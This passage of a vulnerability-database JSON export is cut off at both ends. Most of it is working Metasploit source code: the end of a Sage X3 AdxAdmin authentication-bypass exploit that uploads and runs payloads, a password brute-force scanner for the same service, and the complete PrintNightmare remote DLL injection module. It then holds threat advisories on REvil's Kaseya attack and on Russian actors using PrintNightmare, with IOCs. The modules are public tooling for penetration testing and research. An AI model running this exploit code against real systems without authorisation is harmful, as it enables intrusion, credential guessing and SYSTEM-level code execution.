|| res.length != 4\n print_bad('ADXDIR authentication failed')\n return CheckCode::Safe\n end\n\n if res.chars == [\"\\xFF\", \"\\xFF\", \"\\xFF\", \"\\xFF\"]\n print_bad('ADXDIR authentication failed')\n return CheckCode::Safe\n end\n\n print_good('ADXDIR authentication successful.')\n\n # ADXDIR command\n adx_dir_msg = \"\\x07\\x41\\x44\\x58\\x44\\x49\\x52\\x00\"\n s.write(adx_dir_msg)\n directory = s.read(1024)\n\n return CheckCode::Safe if directory.nil?\n\n sagedir = directory[4..-2]\n print_good(format('Received directory info from host: %s', sagedir))\n disconnect\n\n CheckCode::Vulnerable(details: { sagedir: sagedir })\n rescue Rex::ConnectionError\n CheckCode::Unknown\n end\n\n def build_buffer(head, sage_payload, tail)\n buffer = ''\n\n # do things\n buffer << head if head\n buffer << sage_payload.length\n buffer << sage_payload\n buffer << tail if tail\n\n buffer\n end\n\n def write_file(sock, filenum, sage_payload, target, sagedir)\n s = sock\n\n # building the initial authentication packet\n # [2bytes][userlen 1 byte][username][userlen 1 byte][username][passlen 1 byte][CRYPT:HASH]\n # Note: the first byte of this auth packet is different from the ADXDIR command\n\n revsagedir = sagedir.gsub('\\\\', '/')\n\n s.write(\"\\x06\\x00\")\n auth_resp = s.read(1024)\n\n fail_with(Failure::UnexpectedReply, 'Directory message did not provide intended response') if auth_resp.length != 4\n\n print_good('Command authentication successful.')\n\n # May require additional information such as file path\n # this will be used for multiple messages\n\n head = \"\\x00\\x00\\x36\\x02\\x00\\x2e\\x00\" # head\n fmt = '@%s/tmp/cmd%s$cmd'\n fmt = '@%s/tmp/cmd%s.dll' if target == 'Windows DLL'\n fmt = '@%s/tmp/cmd%s.exe' if target == 'Windows Executable'\n pload = format(fmt, revsagedir, filenum)\n tail = \"\\x00\\x03\\x00\\x01\\x77\"\n sendbuf = build_buffer(head, pload, tail)\n s.write(sendbuf)\n s.read(1024)\n\n # Packet --- 3\n # Creating the packet that contains the command 
to run\n head = \"\\x02\\x00\\x05\\x08\\x00\\x00\\x00\"\n\n # this writes the data to the .cmd file to get executed\n # a single write can't be larger than ~250 bytes\n # so writes larger than 250 need to be broken up\n written = 0\n print_status('Writing data')\n\n while written < sage_payload.length\n vprint('.')\n\n towrite = sage_payload[written..written + 250]\n sendbuf = build_buffer(head, towrite, nil)\n s.write(sendbuf)\n s.recv(1024)\n\n written += towrite.length\n end\n\n vprint(\"\\r\\n\")\n end\n\n def exploit\n sage_payload = payload.encoded if target.name == 'Windows Command'\n sage_payload = generate_payload_dll if target.name == 'Windows DLL'\n sage_payload = generate_payload_exe if target.name == 'Windows Executable'\n\n sagedir = check.details[:sagedir]\n\n if sagedir.nil?\n fail_with(Failure::NotVulnerable,\n 'No directory was returned by the remote host, may not be vulnerable')\n end\n\n if sagedir.end_with?('AdxAdmin')\n register_dir_for_cleanup(\"#{sagedir}\\\\tmp\")\n end\n\n revsagedir = sagedir.gsub('\\\\', '/')\n\n filenum = rand_text_numeric(8)\n vprint_status(format('Using generated filename: %s', filenum))\n\n s = connect\n\n write_file(s, filenum, sage_payload, target.name, sagedir)\n\n unless target.name == 'Windows Command'\n disconnect\n # re-establish connection after writing file\n s = connect\n end\n\n if target.name == 'Windows DLL'\n sage_payload = \"rundll32.exe #{sagedir}\\\\tmp\\\\cmd#{filenum}.dll,0\"\n vprint_status(sage_payload)\n write_file(s, filenum, sage_payload, nil, sagedir)\n end\n\n if target.name == 'Windows Executable'\n sage_payload = \"#{sagedir}\\\\tmp\\\\cmd#{filenum}.exe\"\n vprint_status(sage_payload)\n write_file(s, filenum, sage_payload, nil, sagedir)\n end\n\n # Some sort of delimiter\n delim0 = \"\\x02\\x00\\x01\\x01\" # bufm\n s.write(delim0)\n s.recv(1024)\n\n # Packet --- 4\n sage_payload = \"@#{revsagedir}/tmp/sess#{filenum}$cmd\"\n head = \"\\x00\\x00\\x37\\x02\\x00\\x2f\\x00\"\n tail = 
\"\\x00\\x03\\x00\\x01\\x77\"\n sendbuf = build_buffer(head, sage_payload, tail)\n s.write(sendbuf)\n s.recv(1024)\n\n # Packet --- 5\n head = \"\\x02\\x00\\x05\\x08\\x00\\x00\\x00\"\n sage_payload = \"@echo off\\r\\n#{sagedir}\\\\tmp\\\\cmd#{filenum}.cmd 1>#{sagedir}\\\\tmp\\\\#{filenum}.out 2>#{sagedir}\\\\tmp\\\\#{filenum}.err\\r\\n@echo on\"\n sendbuf = build_buffer(head, sage_payload, nil)\n s.write(sendbuf)\n s.recv(1024)\n\n # Packet --- Delim\n s.write(delim0)\n s.recv(1024)\n\n # Packet --- 6\n head = \"\\x00\\x00\\x36\\x04\\x00\\x2e\\x00\"\n sage_payload = \"#{revsagedir}\\\\tmp\\\\sess#{filenum}.cmd\"\n tail = \"\\x00\\x03\\x00\\x01\\x72\"\n sendbuf = build_buffer(head, sage_payload, tail)\n s.write(sendbuf)\n s.recv(1024)\n\n # if it's not COMMAND, we can stop here\n # otherwise, we'll send/recv the last bit\n # of info for the output\n unless target.name == 'Windows Command'\n disconnect\n return\n end\n\n # Packet --- Delim\n delim1 = \"\\x02\\x00\\x05\\x05\\x00\\x00\\x10\\x00\"\n s.write(delim1)\n s.recv(1024)\n\n # Packet --- Delim\n s.write(delim0)\n s.recv(1024)\n\n # The two below are directing the server to read from the .out file that should have been created\n # Then we get the output back\n # Packet --- 7 - Still works when removed.\n head = \"\\x00\\x00\\x2f\\x07\\x08\\x00\\x2b\\x00\"\n sage_payload = \"@#{revsagedir}/tmp/#{filenum}$out\"\n sendbuf = build_buffer(head, sage_payload, nil)\n s.write(sendbuf)\n s.recv(1024)\n\n # Packet --- 8\n head = \"\\x00\\x00\\x33\\x02\\x00\\x2b\\x00\"\n sage_payload = \"@#{revsagedir}/tmp/#{filenum}$out\"\n tail = \"\\x00\\x03\\x00\\x01\\x72\"\n sendbuf = build_buffer(head, sage_payload, tail)\n s.write(sendbuf)\n s.recv(1024)\n\n s.write(delim1)\n returned_data = s.recv(8096).strip!\n\n if returned_data.nil? 
|| returned_data.empty?\n disconnect\n fail_with(Failure::PayloadFailed, 'No data appeared to be returned, try again')\n end\n\n print_good('------------ Response Received ------------')\n print_status(returned_data)\n disconnect\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/sage/x3_adxsrv_auth_bypass_cmd_exec.rb", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-04-15T03:49:00", "description": "This module allows an attacker to perform a password guessing attack against the Sage X3 AdxAdmin service, which in turn can be used to authenticate to a local Windows account. This module implements the X3Crypt function to 'encrypt' any passwords to be used during the authentication process, given a plaintext password.\n", "cvss3": {}, "published": "2021-07-21T01:07:08", "type": "metasploit", "title": "Sage X3 AdxAdmin Login Scanner", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-7387"], "modified": "2021-09-02T15:57:38", "id": "MSF:AUXILIARY-SCANNER-SAGE-X3_ADXSRV_LOGIN-", "href": "https://www.rapid7.com/db/modules/auxiliary/scanner/sage/x3_adxsrv_login/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'metasploit/framework/login_scanner/x3'\nrequire 'metasploit/framework/credential_collection'\n\nclass MetasploitModule < Msf::Auxiliary\n\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::AuthBrute\n include Msf::Exploit::Remote::Tcp\n\n def initialize(_info = {})\n super(\n 'Name' => 'Sage X3 AdxAdmin Login Scanner',\n 'Description' => %q{\n This module allows an attacker to perform a password guessing attack against\n the Sage X3 AdxAdmin service, which in turn can be used to authenticate to\n a local Windows account.\n\n This module implements the X3Crypt function to 'encrypt' any passwords to\n be used during 
the authentication process, given a plaintext password.\n },\n 'Author' => ['Jonathan Peterson <deadjakk[at]shell.rip>'], # @deadjakk\n 'License' => MSF_LICENSE,\n 'References' => [\n ['URL', 'https://www.rapid7.com/blog/post/2021/07/07/cve-2020-7387-7390-multiple-sage-x3-vulnerabilities/']\n ]\n )\n\n register_options(\n [\n Opt::RPORT(1818),\n OptString.new('USERNAME', [false, 'User with which to authenticate to the AdxAdmin service', 'x3admin']),\n OptString.new('PASSWORD', [false, 'Plaintext password with which to authenticate', 's@ge2020'])\n ]\n )\n\n deregister_options('PASSWORD_SPRAY', 'BLANK_PASSWORDS')\n end\n\n def run_host(ip)\n cred_collection = build_credential_collection(\n blank_passwords: false,\n password: datastore['PASSWORD'],\n username: datastore['USERNAME']\n )\n\n scanner = Metasploit::Framework::LoginScanner::X3.new(\n host: ip,\n port: rport,\n cred_details: cred_collection,\n stop_on_success: datastore['STOP_ON_SUCCESS'],\n bruteforce_speed: datastore['BRUTEFORCE_SPEED'],\n max_send_size: datastore['TCP::max_send_size'],\n send_delay: datastore['TCP::send_delay'],\n framework: framework,\n framework_module: self,\n local_port: datastore['CPORT'],\n local_host: datastore['CHOST']\n )\n\n scanner.scan! 
do |result|\n credential_data = result.to_h\n credential_data.merge!(\n module_fullname: fullname,\n workspace_id: myworkspace_id\n )\n\n case result.status\n when Metasploit::Model::Login::Status::SUCCESSFUL\n print_brute(level: :good, ip: ip, msg: \"Success: '#{result.credential}'\")\n credential_core = create_credential(credential_data)\n credential_data[:core] = credential_core\n create_credential_login(credential_data)\n next\n when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT\n vprint_brute(level: :verror, ip: ip, msg: \"Could not connect: #{result.proof}\")\n when Metasploit::Model::Login::Status::INCORRECT\n vprint_brute(level: :verror, ip: ip, msg: \"Failed: '#{result.credential}'\")\n end\n\n invalidate_login(credential_data)\n end\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/sage/x3_adxsrv_login.rb", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-24T15:45:01", "description": "The print spooler service can be abused by an authenticated remote attacker to load a DLL through a crafted DCERPC request, resulting in remote code execution as NT AUTHORITY\\SYSTEM. 
This module uses the MS-RPRN vector which requires the Print Spooler service to be running.\n", "cvss3": {}, "published": "2022-05-16T18:56:46", "type": "metasploit", "title": "Print Spooler Remote DLL Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2022-05-24T13:16:30", "id": "MSF:EXPLOIT-WINDOWS-DCERPC-CVE_2021_1675_PRINTNIGHTMARE-", "href": "https://www.rapid7.com/db/modules/exploit/windows/dcerpc/cve_2021_1675_printnightmare/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'windows_error'\nrequire 'ruby_smb'\nrequire 'ruby_smb/error'\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::DCERPC\n include Msf::Exploit::Remote::SMB::Client::Authenticated\n include Msf::Exploit::Remote::SMB::Server::Share\n include Msf::Exploit::Retry\n include Msf::Exploit::EXE\n include Msf::Exploit::Deprecated\n\n moved_from 'auxiliary/admin/dcerpc/cve_2021_1675_printnightmare'\n\n PrintSystem = RubySMB::Dcerpc::PrintSystem\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Print Spooler Remote DLL Injection',\n 'Description' => %q{\n The print spooler service can be abused by an authenticated remote attacker to load a DLL through a crafted\n DCERPC request, resulting in remote code execution as NT AUTHORITY\\SYSTEM. 
This module uses the MS-RPRN\n vector which requires the Print Spooler service to be running.\n },\n 'Author' => [\n 'Zhiniang Peng', # vulnerability discovery / research\n 'Xuefeng Li', # vulnerability discovery / research\n 'Zhipeng Huo', # vulnerability discovery\n 'Piotr Madej', # vulnerability discovery\n 'Zhang Yunhai', # vulnerability discovery\n 'cube0x0', # PoC\n 'Spencer McIntyre', # metasploit module\n 'Christophe De La Fuente', # metasploit module co-author\n ],\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => {\n 'SRVHOST' => Rex::Socket.source_address\n },\n 'Stance' => Msf::Exploit::Stance::Aggressive,\n 'Targets' => [\n [\n 'Windows', {\n 'Platform' => 'win',\n 'Arch' => [ ARCH_X64, ARCH_X86 ]\n },\n ],\n ],\n 'DisclosureDate' => '2021-06-08',\n 'References' => [\n ['CVE', '2021-1675'],\n ['CVE', '2021-34527'],\n ['URL', 'https://github.com/cube0x0/CVE-2021-1675'],\n ['URL', 'https://web.archive.org/web/20210701042336/https://github.com/afwu/PrintNightmare'],\n ['URL', 'https://github.com/calebstewart/CVE-2021-1675/blob/main/CVE-2021-1675.ps1'],\n ['URL', 'https://github.com/byt3bl33d3r/ItWasAllADream']\n ],\n 'Notes' => {\n 'AKA' => [ 'PrintNightmare' ],\n 'Stability' => [CRASH_SERVICE_DOWN],\n 'Reliability' => [UNRELIABLE_SESSION],\n 'SideEffects' => [\n ARTIFACTS_ON_DISK # the dll will be copied to the remote server\n ]\n }\n )\n )\n\n register_advanced_options(\n [\n OptInt.new('ReconnectTimeout', [ true, 'The timeout in seconds for reconnecting to the named pipe', 10 ])\n ]\n )\n deregister_options('AutoCheck')\n end\n\n def check\n begin\n connect(backend: :ruby_smb)\n rescue Rex::ConnectionError\n return Exploit::CheckCode::Unknown('Failed to connect to the remote service.')\n end\n\n begin\n smb_login\n rescue Rex::Proto::SMB::Exceptions::LoginError\n return Exploit::CheckCode::Unknown('Failed to authenticate to the remote service.')\n end\n\n begin\n dcerpc_bind_spoolss\n rescue RubySMB::Error::UnexpectedStatusCode => e\n nt_status = 
::WindowsError::NTStatus.find_by_retval(e.status_code.value).first\n if nt_status == ::WindowsError::NTStatus::STATUS_OBJECT_NAME_NOT_FOUND\n print_error(\"The 'Print Spooler' service is disabled.\")\n end\n return Exploit::CheckCode::Safe(\"The DCERPC bind failed with error #{nt_status.name} (#{nt_status.description}).\")\n end\n\n @target_arch = dcerpc_getarch\n # see: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/e81cbc09-ab05-4a32-ae4a-8ec57b436c43\n if @target_arch == ARCH_X64\n @environment = 'Windows x64'\n elsif @target_arch == ARCH_X86\n @environment = 'Windows NT x86'\n else\n return Exploit::CheckCode::Detected('Successfully bound to the remote service.')\n end\n\n print_status(\"Target environment: Windows v#{simple.client.os_version} (#{@target_arch})\")\n\n print_status('Enumerating the installed printer drivers...')\n drivers = enum_printer_drivers(@environment)\n @driver_path = \"#{drivers.driver_path.rpartition('\\\\').first}\\\\UNIDRV.DLL\"\n vprint_status(\"Using driver path: #{@driver_path}\")\n\n print_status('Retrieving the path of the printer driver directory...')\n @config_directory = get_printer_driver_directory(@environment)\n vprint_status(\"Using driver directory: #{@config_directory}\") unless @config_directory.nil?\n\n container = driver_container(\n p_config_file: 'C:\\\\Windows\\\\System32\\\\kernel32.dll',\n p_data_file: \"\\\\??\\\\UNC\\\\127.0.0.1\\\\#{Rex::Text.rand_text_alphanumeric(4..8)}\\\\#{Rex::Text.rand_text_alphanumeric(4..8)}.dll\"\n )\n\n case add_printer_driver_ex(container)\n when nil # prevent the module from erroring out in case the response can't be mapped to a Win32 error code\n return Exploit::CheckCode::Unknown('Received unknown status code, implying the target is not vulnerable.')\n when ::WindowsError::Win32::ERROR_PATH_NOT_FOUND\n return Exploit::CheckCode::Vulnerable('Received ERROR_PATH_NOT_FOUND, implying the target is vulnerable.')\n when ::WindowsError::Win32::ERROR_BAD_NET_NAME\n 
return Exploit::CheckCode::Vulnerable('Received ERROR_BAD_NET_NAME, implying the target is vulnerable.')\n when ::WindowsError::Win32::ERROR_ACCESS_DENIED\n return Exploit::CheckCode::Safe('Received ERROR_ACCESS_DENIED implying the target is patched.')\n end\n\n Exploit::CheckCode::Detected('Successfully bound to the remote service.')\n end\n\n def run\n fail_with(Failure::BadConfig, 'Can not use an x64 payload on an x86 target.') if @target_arch == ARCH_X86 && payload.arch.first == ARCH_X64\n fail_with(Failure::NoTarget, 'Only x86 and x64 targets are supported.') if @environment.nil?\n fail_with(Failure::Unknown, 'Failed to enumerate the driver directory.') if @config_directory.nil?\n\n super\n end\n\n def setup\n if Rex::Socket.is_ip_addr?(datastore['SRVHOST']) && Rex::Socket.addr_atoi(datastore['SRVHOST']) == 0\n fail_with(Exploit::Failure::BadConfig, 'The SRVHOST option must be set to a routable IP address.')\n end\n\n super\n end\n\n def start_service\n file_name << '.dll'\n self.file_contents = generate_payload_dll\n\n super\n end\n\n def primer\n dll_path = unc\n if dll_path =~ /^\\\\\\\\([\\w:.\\[\\]]+)\\\\(.*)$/\n # targets patched for CVE-2021-34527 (but with Point and Print enabled) need to use this path style as a bypass\n # otherwise the operation will fail with ERROR_INVALID_PARAMETER\n dll_path = \"\\\\??\\\\UNC\\\\#{Regexp.last_match(1)}\\\\#{Regexp.last_match(2)}\"\n end\n vprint_status(\"Using DLL path: #{dll_path}\")\n\n filename = dll_path.rpartition('\\\\').last\n container = driver_container(p_config_file: 'C:\\\\Windows\\\\System32\\\\kernel32.dll', p_data_file: dll_path)\n\n 3.times do\n add_printer_driver_ex(container)\n end\n\n 1.upto(3) do |directory|\n container.driver_info.p_config_file.assign(\"#{@config_directory}\\\\3\\\\old\\\\#{directory}\\\\#(unknown)\")\n break if add_printer_driver_ex(container).nil?\n end\n\n cleanup_service\n end\n\n def driver_container(**kwargs)\n PrintSystem::DriverContainer.new(\n level: 2,\n tag: 2,\n 
driver_info: PrintSystem::DriverInfo2.new(\n c_version: 3,\n p_name_ref_id: 0x00020000,\n p_environment_ref_id: 0x00020004,\n p_driver_path_ref_id: 0x00020008,\n p_data_file_ref_id: 0x0002000c,\n p_config_file_ref_id: 0x00020010,\n # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/4464eaf0-f34f-40d5-b970-736437a21913\n p_name: \"#{Rex::Text.rand_text_alpha_upper(2..4)} #{Rex::Text.rand_text_numeric(2..3)}\",\n p_environment: @environment,\n p_driver_path: @driver_path,\n **kwargs\n )\n )\n end\n\n def dcerpc_bind_spoolss\n handle = dcerpc_handle(PrintSystem::UUID, '1.0', 'ncacn_np', ['\\\\spoolss'])\n vprint_status(\"Binding to #{handle} ...\")\n dcerpc_bind(handle)\n vprint_status(\"Bound to #{handle} ...\")\n end\n\n def enum_printer_drivers(environment)\n response = rprn_call('RpcEnumPrinterDrivers', p_environment: environment, level: 2)\n response = rprn_call('RpcEnumPrinterDrivers', p_environment: environment, level: 2, p_drivers: [0] * response.pcb_needed, cb_buf: response.pcb_needed)\n fail_with(Failure::UnexpectedReply, 'Failed to enumerate printer drivers.') unless response.p_drivers&.length\n DriverInfo2.read(response.p_drivers.map(&:chr).join)\n end\n\n def get_printer_driver_directory(environment)\n response = rprn_call('RpcGetPrinterDriverDirectory', p_environment: environment, level: 2)\n response = rprn_call('RpcGetPrinterDriverDirectory', p_environment: environment, level: 2, p_driver_directory: [0] * response.pcb_needed, cb_buf: response.pcb_needed)\n fail_with(Failure::UnexpectedReply, 'Failed to obtain the printer driver directory.') unless response.p_driver_directory&.length\n RubySMB::Field::Stringz16.read(response.p_driver_directory.map(&:chr).join).encode('ASCII-8BIT')\n end\n\n def add_printer_driver_ex(container)\n flags = PrintSystem::APD_INSTALL_WARNED_DRIVER | PrintSystem::APD_COPY_FROM_DIRECTORY | PrintSystem::APD_COPY_ALL_FILES\n\n begin\n response = rprn_call('RpcAddPrinterDriverEx', p_name: 
\"\\\\\\\\#{datastore['RHOST']}\", p_driver_container: container, dw_file_copy_flags: flags)\n rescue RubySMB::Error::UnexpectedStatusCode => e\n nt_status = ::WindowsError::NTStatus.find_by_retval(e.status_code.value).first\n message = \"Error #{nt_status.name} (#{nt_status.description})\"\n if nt_status == ::WindowsError::NTStatus::STATUS_PIPE_BROKEN\n # STATUS_PIPE_BROKEN is the return value when the payload is executed, so this is somewhat expected\n print_status('The named pipe connection was broken, reconnecting...')\n reconnected = retry_until_truthy(timeout: datastore['ReconnectTimeout'].to_i) do\n dcerpc_bind_spoolss\n rescue RubySMB::Error::CommunicationError, RubySMB::Error::UnexpectedStatusCode => e\n false\n else\n true\n end\n\n unless reconnected\n vprint_status('Failed to reconnect to the named pipe.')\n return nil\n end\n\n print_status('Successfully reconnected to the named pipe.')\n retry\n else\n print_error(message)\n end\n\n return nt_status\n end\n\n error = ::WindowsError::Win32.find_by_retval(response.error_status.value).first\n message = \"RpcAddPrinterDriverEx response #{response.error_status}\"\n message << \" #{error.name} (#{error.description})\" unless error.nil?\n vprint_status(message)\n error\n end\n\n def rprn_call(name, **kwargs)\n request = PrintSystem.const_get(\"#{name}Request\").new(**kwargs)\n\n begin\n raw_response = dcerpc.call(request.opnum, request.to_binary_s)\n rescue Rex::Proto::DCERPC::Exceptions::Fault => e\n fail_with(Failure::UnexpectedReply, \"The #{name} Print System RPC request failed (#{e.message}).\")\n end\n\n PrintSystem.const_get(\"#{name}Response\").read(raw_response)\n end\n\n class DriverInfo2Header < BinData::Record\n endian :little\n\n uint32 :c_version\n uint32 :name_offset\n uint32 :environment_offset\n uint32 :driver_path_offset\n uint32 :data_file_offset\n uint32 :config_file_offset\n end\n\n # this is a partial implementation that just parses the data, this is *not* the same struct as 
PrintSystem::DriverInfo2\n # see: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/2825d22e-c5a5-47cd-a216-3e903fd6e030\n DriverInfo2 = Struct.new(:header, :name, :environment, :driver_path, :data_file, :config_file) do\n def self.read(data)\n header = DriverInfo2Header.read(data)\n new(\n header,\n RubySMB::Field::Stringz16.read(data[header.name_offset..]).encode('ASCII-8BIT'),\n RubySMB::Field::Stringz16.read(data[header.environment_offset..]).encode('ASCII-8BIT'),\n RubySMB::Field::Stringz16.read(data[header.driver_path_offset..]).encode('ASCII-8BIT'),\n RubySMB::Field::Stringz16.read(data[header.data_file_offset..]).encode('ASCII-8BIT'),\n RubySMB::Field::Stringz16.read(data[header.config_file_offset..]).encode('ASCII-8BIT')\n )\n end\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/dcerpc/cve_2021_1675_printnightmare.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "hivepro": [{"lastseen": "2021-08-23T15:19:10", "description": "#### THREAT LEVEL: Red.\n\nFor a detailed advisory, [download the pdf file here](<https://www.hivepro.com/wp-content/uploads/2021/07/TA202124.pdf>).\n\nThe REvil ransomware group was successful in carrying out a supply chain attack by exploiting the zero-day vulnerability (CVE-2021-30116) in the Kaseya VSA server and delivering a malicious script to all the computer devices managed by servers. 
The script delivered the REvil ransomware and encrypted the files of the clients managed by the server, affecting almost 1 million computer devices.\n\nHive Pro researchers have identified that there are three more zero-day vulnerabilities that were possibly used to target the clients:\n\n * Authentication Bypass Vulnerability\n * Arbitrary File Upload Vulnerability\n * Code Injection Vulnerability\n\n**The techniques used by the REvil ransomware include:**\n\n * TA0001: Initial Access\n * T1189: Drive-by Compromise\n * T1566: Phishing\n * T1566.001: Spearphishing Attachment\n * TA0002: Execution\n * T1059: Command and Scripting Interpreter\n * T1106: Native API\n * T1059.001: PowerShell\n * T1059.005: Visual Basic\n * T1059.003: Windows Command Shell\n * TA0003: Persistence\n * T1204: User Execution\n * T1047: Windows Management Instrumentation\n * T1204.002: Malicious File\n * TA0004: Privilege Escalation\n * T1134: Access Token Manipulation\n * T1134.002: Create Process with Token\n * T1134.001: Token Impersonation/Theft\n * T1574: Hijack Execution Flow\n * T1574.002: Hijack Execution Flow: DLL Side-Loading\n * TA0005: Defense Evasion\n * T1134: Access Token Manipulation\n * T1134.002: Create Process with Token\n * T1134.001: Token Impersonation/Theft\n * T1140: Deobfuscate/Decode Files or Information\n * T1055: Process Injection\n * TA0006: Credential Access\n * T1562: Impair Defenses\n * T1562.001: Disable or Modify Tools\n * T1070: Indicator Removal on Host\n * T1070.004: File Deletion\n * T1036: Masquerading\n * T1036.005: Match Legitimate Name or Location\n * T1112: Modify Registry\n * T1027: Obfuscated Files or Information\n * T1055: Process Injection\n * TA0007: Discovery\n * T1083: File and Directory Discovery\n * TA0008: Lateral Movement\n * T1069: Permission Groups Discovery\n * T1069.002: Domain Groups\n * T1012: Query Registry\n * T1082: System Information Discovery\n * TA0011: Command and Control\n * T1071: Application Layer Protocol\n * T1071.001: 
Web Protocols \n * T1573: Encrypted Channel \n * T1573.002: Asymmetric Cryptography\n * T1105: Ingress Tool Transfer\n * TA0010: Exfiltration\n * T1041: Exfiltration Over C2 Channel\n * TA0040: Impact\n * T1485: Data Destruction\n * T1486: Data Encrypted for Impact\n * T1490: Inhibit System Recovery \n * T1489: Service Stop\n\n#### Threat Actor\n\n\n\n#### Vulnerability Details\n\n\n\n#### Indicators of Compromise\n\n**Type**| **Value** \n---|--- \nIPv4| 161[.]35.239.148 \nHash(SHA1)| d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e \n8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd \ne2a24ab94f865caeacdf2c3ad015f31f23008ac6db8312c2cbfb32e4a5466ea2 \n45AEBD60E3C4ED8D3285907F5BF6C71B3B60A9BCB7C34E246C20410CF678FC0C \n \n#### References\n\n<https://www.bleepingcomputer.com/news/security/kaseya-was-fixing-zero-day-just-as-revil-ransomware-sprung-their-attack/>\n\n<https://otx.alienvault.com/pulse/60e40b4535299fb6755143cf>\n\n<https://us-cert.cisa.gov/ncas/current-activity/2021/07/02/kaseya-vsa-supply-chain-ransomware-attack>\n\n<https://www.tenable.com/blog/cve-2021-30116-multiple-zero-day-vulnerabilities-in-kaseya-vsa-exploited-to-distribute-ransomware>\n\n<https://www.reddit.com/r/msp/comments/ocggbv/crticial_ransomware_incident_in_progress/>\n\n<https://blog.truesec.com/2021/07/04/kaseya-supply-chain-attack-targeting-msps-to-deliver-revil-ransomware/>", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-08T12:32:57", "type": "hivepro", "title": "REvil Ransomware gang behind the Kaseya VSA Supply-Chain attack", "bulletinFamily": "info", "cvss2": 
{"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30116"], "modified": "2021-07-08T12:32:57", "id": "HIVEPRO:3E02C2FF0A137A10F6A8876C69C320B3", "href": "https://www.hivepro.com/revil-ransomware-gang-behind-the-kaseya-vsa-supply-chain-attack/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-03-22T07:28:58", "description": "#### THREAT LEVEL: Red.\n\nFor a detailed advisory, download the pdf file here.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) have issued an alert for enterprises that Russian state-sponsored cyber attackers have obtained network access by exploiting default MFA protocols and a known vulnerability. Russian state-sponsored cyber attackers got initial access to the target organization by using compromised credentials and registering a new device in the organization's Duo multi-factor authentication (MFA). The actors obtained the credentials using a brute-force password guessing attack, which provided them with access to a victim account with a basic, predictable password. The victim account had been unenrolled from Duo after a long period of inactivity, but it had not been deactivated in Active Directory. The actors were able to enroll a new device for this account, satisfy the authentication requirements, and get access to the victim network since Duo's default configuration settings allow for the re-enrollment of a new device for inactive accounts. 
Using the stolen account, Russian state-sponsored cyber attackers gained administrator rights by exploiting the \"PrintNightmare\" vulnerability (CVE-2021-34527). Furthermore, the cyber actors were able to obtain required material by moving laterally to the victim's cloud storage and email accounts.\n\nOrganizations can apply the following mitigations:\n\n * To protect against \"fail open\" and re-enrollment scenarios, enforce MFA and examine configuration restrictions.\n * Assure that inactive accounts are deactivated consistently across the Active Directory and MFA systems.\n * Ensure that inactive accounts are deactivated equally across Active Directory, MFA systems, and other systems.\n * Update software such as operating systems, apps, and hardware on a regular basis.\n\nThe Mitre TTPs used in the current attack are:\n\n * TA0001 - Initial Access\n * TA0003 - Persistence\n * TA0004 - Privilege Escalation\n * TA0005 - Defense Evasion\n * TA0006 - Credential Access\n * TA0007 - Discovery\n * TA0008 - Lateral Movement\n * TA0009 - Collection\n * T1078: Valid Accounts\n * T1133: External Remote Services\n * T1556: Modify Authentication Process\n * T1068: Exploitation for Privilege Escalation\n * T1112: Modify Registry\n * T1110.001: Brute Force: Password Guessing\n * T1003.003: OS Credential Dumping: NTDS\n * T1018: Remote System Discovery\n * T1560.001: Archive Collected Data: Archive via Utility\n\n#### Vulnerability Details\n\n#### Indicators of Compromise (IoCs)\n\n#### Patch Link\n\n<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>\n\n#### References\n\n<https://www.cisa.gov/uscert/ncas/alerts/aa22-074a>", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", 